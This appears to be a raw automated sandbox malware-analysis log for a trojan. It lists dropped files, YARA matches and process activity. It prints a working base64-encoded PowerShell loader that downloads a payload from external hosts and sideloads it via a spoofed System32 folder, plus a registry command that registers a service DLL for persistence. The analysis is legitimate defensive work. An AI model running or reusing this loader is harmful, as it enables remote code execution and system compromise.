          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to behavior
          Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x590769.datJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_xdtyzoyv.xau.ps1Jump to behavior
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF111ECC0_2_00007FF7DF111ECC
          Source: C:\Users\user\Desktop\app64.exeCode function: 0_2_00007FF7DF111B110_2_00007FF7DF111B11
          Source: C:\Windows \System32\printui.exeCode function: 10_2_00007FF67A0E10E010_2_00007FF67A0E10E0
          Source: C:\Windows \System32\printui.exeCode function: 13_2_00007FF67A0E10E013_2_00007FF67A0E10E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6600A23028_2_6600A230
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6601076028_2_66010760
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6600981028_2_66009810
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6600BC9028_2_6600BC90
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_660050A028_2_660050A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_66019CB028_2_66019CB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6600ACD028_2_6600ACD0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_66004CE028_2_66004CE0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6600DD2028_2_6600DD20
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6600CD6028_2_6600CD60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6600E58028_2_6600E580
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6600D5A028_2_6600D5A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_660121B028_2_660121B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6828A0B028_2_6828A0B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6828C22028_2_6828C220
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_68281C1028_2_68281C10
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_6828350028_2_68283500
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_682926C128_2_682926C1
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7FC100828_2_00007FF8A7FC1008
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7F0AD3028_2_00007FF8A7F0AD30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7F04C8C28_2_00007FF8A7F04C8C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7FAE9C428_2_00007FF8A7FAE9C4
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7F0290028_2_00007FF8A7F02900
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7F043B128_2_00007FF8A7F043B1
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7F89A9028_2_00007FF8A7F89A90
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7FC0AB028_2_00007FF8A7FC0AB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7F03B0028_2_00007FF8A7F03B00
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7F0E34028_2_00007FF8A7F0E340
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7F0BCA928_2_00007FF8A7F0BCA9
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A7F0B4E028_2_00007FF8A7F0B4E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933131028_2_00007FF8A9331310
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FCA9028_2_00007FF8A92FCA90
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93569E028_2_00007FF8A93569E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9344CC028_2_00007FF8A9344CC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9334CD028_2_00007FF8A9334CD0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9328B6028_2_00007FF8A9328B60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933CB3028_2_00007FF8A933CB30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92E0EB028_2_00007FF8A92E0EB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931EDC028_2_00007FF8A931EDC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932F0F028_2_00007FF8A932F0F0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93470A028_2_00007FF8A93470A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9332FA028_2_00007FF8A9332FA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A930C24028_2_00007FF8A930C240
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D221028_2_00007FF8A92D2210
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931C21028_2_00007FF8A931C210
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933A2E028_2_00007FF8A933A2E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A935C28028_2_00007FF8A935C280
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F22E028_2_00007FF8A92F22E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933E4E028_2_00007FF8A933E4E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931835028_2_00007FF8A9318350
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EC61028_2_00007FF8A92EC610
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933A6B028_2_00007FF8A933A6B0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A934055028_2_00007FF8A9340550
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A933059028_2_00007FF8A9330590
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931C70028_2_00007FF8A931C700
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932DAD028_2_00007FF8A932DAD0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EB95028_2_00007FF8A92EB950
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9359C4028_2_00007FF8A9359C40
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9335C2028_2_00007FF8A9335C20
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D3C4028_2_00007FF8A92D3C40
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9349CC128_2_00007FF8A9349CC1
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DFBB028_2_00007FF8A92DFBB0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92FDEA028_2_00007FF8A92FDEA0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9345E8028_2_00007FF8A9345E80
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9351D3028_2_00007FF8A9351D30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92DC03028_2_00007FF8A92DC030
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A930202028_2_00007FF8A9302020
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932E0F028_2_00007FF8A932E0F0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A9337FE028_2_00007FF8A9337FE0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A932D26028_2_00007FF8A932D260
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93592A028_2_00007FF8A93592A0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92F32C028_2_00007FF8A92F32C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D740028_2_00007FF8A92D7400
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A931F42028_2_00007FF8A931F420
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93334C028_2_00007FF8A93334C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92D538028_2_00007FF8A92D5380
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93356E028_2_00007FF8A93356E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A92EB83028_2_00007FF8A92EB830
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A934985F28_2_00007FF8A934985F
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8A93438C028_2_00007FF8A93438C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83849E028_2_00007FF8B83849E0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B839AA5228_2_00007FF8B839AA52
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83B6B5028_2_00007FF8B83B6B50
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B839A4A428_2_00007FF8B839A4A4
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83C04A628_2_00007FF8B83C04A6
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B838BA4028_2_00007FF8B838BA40
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83B2B6028_2_00007FF8B83B2B60
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B8372B8028_2_00007FF8B8372B80
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B8371C3028_2_00007FF8B8371C30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B8373D5028_2_00007FF8B8373D50
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83ACDD028_2_00007FF8B83ACDD0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83B3D8028_2_00007FF8B83B3D80
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B839BE3028_2_00007FF8B839BE30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83AFE3028_2_00007FF8B83AFE30
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83BCEC028_2_00007FF8B83BCEC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B837EFC028_2_00007FF8B837EFC0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B8373FE028_2_00007FF8B8373FE0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B836F0C028_2_00007FF8B836F0C0
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_00007FF8B83B00D028_2_00007FF8B83B00D0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74712AD1034_2_00007FF74712AD10
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF7471050D034_2_00007FF7471050D0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF7471180A034_2_00007FF7471180A0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF7471488A834_2_00007FF7471488A8
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF747139F5034_2_00007FF747139F50
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74712973034_2_00007FF747129730
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF747102F9034_2_00007FF747102F90
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74714CF6434_2_00007FF74714CF64
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF7471357C034_2_00007FF7471357C0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74715200034_2_00007FF747152000
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF7471267F034_2_00007FF7471267F0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74714665034_2_00007FF747146650
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74711DE2034_2_00007FF74711DE20
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF747129E6934_2_00007FF747129E69
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF7471176D034_2_00007FF7471176D0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF7471486A434_2_00007FF7471486A4
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74711A6F034_2_00007FF74711A6F0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF747117D6034_2_00007FF747117D60
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74712A5CA34_2_00007FF74712A5CA
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74713C5DC34_2_00007FF74713C5DC
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF7471495E834_2_00007FF7471495E8
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74715B48434_2_00007FF74715B484
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74715249834_2_00007FF747152498
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74715CCB434_2_00007FF74715CCB4
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74710437034_2_00007FF747104370
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74711738034_2_00007FF747117380
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74711239034_2_00007FF747112390
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF7471183E034_2_00007FF7471183E0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74715624034_2_00007FF747156240
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF747117A2034_2_00007FF747117A20
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF747148AAC34_2_00007FF747148AAC
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF747152B1034_2_00007FF747152B10
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF747115AE034_2_00007FF747115AE0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74710218034_2_00007FF747102180
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74715D20C34_2_00007FF74715D20C
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF74712A21034_2_00007FF74712A210
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF747102A1034_2_00007FF747102A10
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83849E034_2_00007FF8B83849E0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B838BA4034_2_00007FF8B838BA40
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B839AA5234_2_00007FF8B839AA52
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83B6B5034_2_00007FF8B83B6B50
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83B2B6034_2_00007FF8B83B2B60
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B8372B8034_2_00007FF8B8372B80
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B8371C3034_2_00007FF8B8371C30
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B8373D5034_2_00007FF8B8373D50
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83ACDD034_2_00007FF8B83ACDD0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83B3D8034_2_00007FF8B83B3D80
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B839BE3034_2_00007FF8B839BE30
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83AFE3034_2_00007FF8B83AFE30
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83BCEC034_2_00007FF8B83BCEC0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B837EFC034_2_00007FF8B837EFC0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B8373FE034_2_00007FF8B8373FE0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B836F0C034_2_00007FF8B836F0C0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83B00D034_2_00007FF8B83B00D0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83AA3A034_2_00007FF8B83AA3A0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B839B4E034_2_00007FF8B839B4E0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83B74F034_2_00007FF8B83B74F0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B839A4A434_2_00007FF8B839A4A4
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83C04A634_2_00007FF8B83C04A6
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B839F50034_2_00007FF8B839F500
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83B867034_2_00007FF8B83B8670
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B83916F034_2_00007FF8B83916F0
          Source: C:\Windows\System32\console_zero.exeCode function: 34_2_00007FF8B839C7B034_2_00007FF8B839C7B0
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A935E0FE appears 63 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8374D20 appears 32 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A935E278 appears 32 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A935E27E appears 39 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A935E1CA appears 1339 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A935E926 appears 36 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8374A70 appears 364 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A935E8A2 appears 128 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A9318FD0 appears 105 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A935EDF0 appears 844 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A935E104 appears 461 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A935E10A appears 59 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8374B60 appears 231 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A935E896 appears 148 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B8374BB0 appears 39 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A93083C0 appears 71 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8B83AE2A0 appears 56 times
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF8A9308330 appears 65 times
          Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B83AE230 appears 37 times
          Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B8374B60 appears 330 times
          Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B8374D20 appears 44 times
          Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B83B3D10 appears 31 times
          Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B8394EB0 appears 39 times
          Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF747103700 appears 97 times
          Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B8394D90 appears 42 times
          Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B8374BB0 appears 52 times
          Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B8374A70 appears 478 times
          Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B83AE2A0 appears 83 times
          Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF8B83A46D0 appears 45 times
          Source: pyld.dll.3.drStatic PE information: Number of sections : 11 > 10
          Source: libwinpthread-1.dll.13.drStatic PE information: Number of sections : 12 > 10
          Source: libintl-9.dll.13.drStatic PE information: Number of sections : 20 > 10
          Source: libiconv-2.dll.13.drStatic PE information: Number of sections : 20 > 10
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f
          Source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 6620, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.evad.winEXE@89/48@10/8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\pyld.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1888:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4748:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3424:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6204:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6716:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gegny5yv.va2.ps1Jump to behavior
          Source: app64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\app64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: app64.exeReversingLabs: Detection: 26%
          Source: svchost.exeString found in binary or memory: -start
          Source: svchost.exeString found in binary or memory: -addr
          Source: svchost.exeString found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
          Source: unknownProcess created: C:\Users\user\Desktop\app64.exe "C:\Users\user\Desktop\app64.exe"
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression 